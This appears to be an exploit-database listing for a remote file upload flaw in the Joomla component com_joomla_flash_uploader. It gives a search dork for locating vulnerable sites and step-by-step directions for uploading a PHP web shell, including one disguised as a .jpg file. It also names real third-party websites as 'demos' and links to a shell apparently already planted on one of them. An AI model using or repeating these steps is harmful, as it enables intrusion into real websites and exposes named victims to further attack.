[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_joomla_flash_uploader Remote File Upload

Author
Zikou-16
Risk
[
Security Risk High
]
0day-ID
0day-ID-19484
Category
web applications
Date add
27-09-2012
Platform
php
 --------------------------------------------------------------
 Joomla Component com_joomla_flash_uploader Remote File Upload
 -------------------------------------------------------------
 
 Exploit Author => Zikou-16 
 My Facebook    => http://www.facebook.com/ZIkOou.16
 -------------------------------------------------------------

 Dork  => inurl:index.php?option=com_joomla_flash_uploader 
 -------------------------------------------------------------

 So !! xD
 First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

 You Will Find a Flash Uploader 
  
 Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf
 
 You Can Upload Your Shell.php or shell.php.jpg
 
 In The Flash Uploader you'll see  Your Shell !! 

 4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php

Demo       ==> http://www.coachforexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98
                ==> http://www.kazulocations.com.au/index.php?option=com_joomla_flash_uploader&Itemid=123
 And Shell ==> http://www.kazulocations.com.au//images/stories/propertyupload/500.php.jpg
 

 Greets To  All Dz Hacker's



#  0day.today [2024-12-24]  #